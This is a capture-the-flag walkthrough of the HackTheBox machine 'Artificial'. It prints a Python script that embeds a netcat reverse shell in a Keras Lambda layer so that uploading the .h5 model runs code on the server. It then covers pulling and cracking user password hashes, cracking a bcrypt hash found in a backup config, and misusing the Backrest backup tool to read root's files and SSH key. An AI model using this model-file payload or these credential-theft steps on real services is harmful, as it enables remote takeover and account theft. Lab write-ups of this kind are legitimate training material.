HackTheBox Artificial Walkthrough

stillemptystillempty
5 min read

Table of contents

So this was a easy linux machine but was quite beatiful while getting rce for user.txt , so lets dive into the walkthrough ,

Initial Enumeration

So as initial enumeration of website i did nmap and gobuster and the result were pretty usual , on nmap we get normal ssh port 22 and website port 80 , in gobutser just login and register page , not too much worthful in view page source too

About website

The webiste at first glance was some ai mode upload website where you can Upload, manage, and run your AI models . We meet with a login page nothing too much unsual about it . After registering and login we are met with a /dasboard page , where we can upload model and in requirements we see tensorflow-cpu==2.13.1 . and with a dockerfile too , so i did some research and found these two blogs ( article 1 , article 2)

Initial Foothold and user.txt

Then based on reading that 2 articles , i made a payload to get rce

import tensorflow as tf
import os

def exploit(x):
    import os
    os.system("rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc <TARGET_IP> 4444 >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")

then i made a docker using the given dockerfile in website using these commands

sudo docker build -t myapp .
sudo docker run --rm -it -v $(pwd):/cwd myapp

use this where your dockerfile is stored , we used docker because that was mentoined in webiste to build models after running the code sudo docker run --rm -it -v $(pwd):/cwd myapp , my docker get start and i m in code directory

with the help of this cmd i was apply to copy paste exploit from my host to docker as nano wasnt there , you can use echo but i used this

sudo docker cp /path/to/tensorflow_h5.py objective_lumiere:/code/tensorflow_h5.py

make sure to use docker ps to get docker name and replace as place of objective_lumiere in case not same for you . then run python tensorflow_h5.py and it will build one exploit.h5 . If you get some error like illegal core dump or illegal instuction , try using wsl or change vm ware manager , after which we used this cmd to get exploit.h5 form docker to host machine and upload it on dashboard

sudo docker cp objective_lumiere:/code/exploit.h5 /path/to/store/

you might get some error like this while building exploit.h5 in docker but ignore it , after upoading the exploit to website and opening port nc -lnvp 4444 on a new terminal we click on view prediction

BOOM!! We got a shell

normalize the shell using this python3 -c 'import pty;pty.spawn("/bin/bash")' and i thought to search some more better foothold or credentials as we are asked to submit password ,mail and username in beginning and voila i found that in /home/app/app/instance/users.db , with the help of python server i used it fetch in my host machine , and found some md5 hash

cracked the hash of gael user using https://crackstation.net/ and got this cleartext pass

i logged in using the cleartext pass of gael in ssh ssh gael@artificial.htb and finally we got user.txt

Privelege Escalation and root.txt

now for root i though of using linpeas.sh imported linpeas using my a python server locally created nad then in the linpeas output i find backrest_backup.tar.gz , the misconfiguration here is the backup system is backing up the credentials

i got this file into my host machine unzipped it and found config.json in it

the pass is a base64 decode it (JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP) , you will find a hash crack it using this cmd , (the backrest_root.txt contains hash)

john backrest_root.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

now do ss -tulnp on the gael terminal you will find port and will see a port 9898

and with this we do port forwarding using this cmd on our localhost

ssh -L 9898:127.0.0.1:9898 gael@artificial.htb

after this when we type localhost:9898 on our machine browser we will see a backrest cms , firstly i didnt know what this is so i read this , after this i got somewhat of idea and took help from a friend on how to use that , first we will login with pass we cracked using john and backrest_root , t username we found in config.json

after this we will first go on repo and do this

click on test configuration and submit and then on plan

and sumbit , also make sure to disable all crontab or policy you will find , only do changes in mandatory fields .

Now go on plan click on backup now and it will run the process like this

After that go to snapshot browser click on drop down then you will find root.txt , click on restore path option then click on restore

it will run another process and after that your root.txt is backed up click on download file and BOOM!! we got root.txt

  • There is one more way which you can do is in plan edit the path from /root/root.txt to /root/.ssh/id_rsa and after that follow same process to download it and give appropriate permission to use it and then you can get root.txt from there too

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!

0
Subscribe to my newsletter

Read articles from stillempty directly inside your inbox. Subscribe to the newsletter, and don't miss out.

HTB MachinesHTB WriteuphtbLinuxredteaming

Written by

stillempty
stillempty